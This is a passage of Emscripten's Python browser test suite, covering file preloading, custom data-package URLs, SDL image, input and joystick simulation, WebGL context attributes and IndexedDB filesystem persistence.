self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
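# The second run should find the package in the custom-named IndexedDB ('testdb'), so the reported result increases to 2.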
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove the source files to make sure the preloaded data is used
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
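# Move the .data file into 'cdn/' so it can only be found via the locateFile override in the custom shell.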
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file should run xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
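# Rename the .data file so the preload request fails and window.onerror reports the missing test.data.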
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
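# Inject reftest.js into the generated page and delay window.close so the reftest runs after the final frame has been rendered.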
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-to-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
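# Run once with default arguments and once with the '-0' flag from flag_0.js, each compared against its own reference image.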
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. The keypress event should not be sent, because default
// handling of the keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
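# Custom page that offsets the canvas with CSS, so the test can verify that mouse coordinates account for the offsets.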
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support for the context attributes we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will still succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest('webgl_parallel_shader_compile.cpp', '1')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest('webgl_explicit_uniform_location.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows the user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
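# The first run (-DFIRST) preloads the secret and stores it in the browser-side database; later runs expect to read the same secret back.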
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
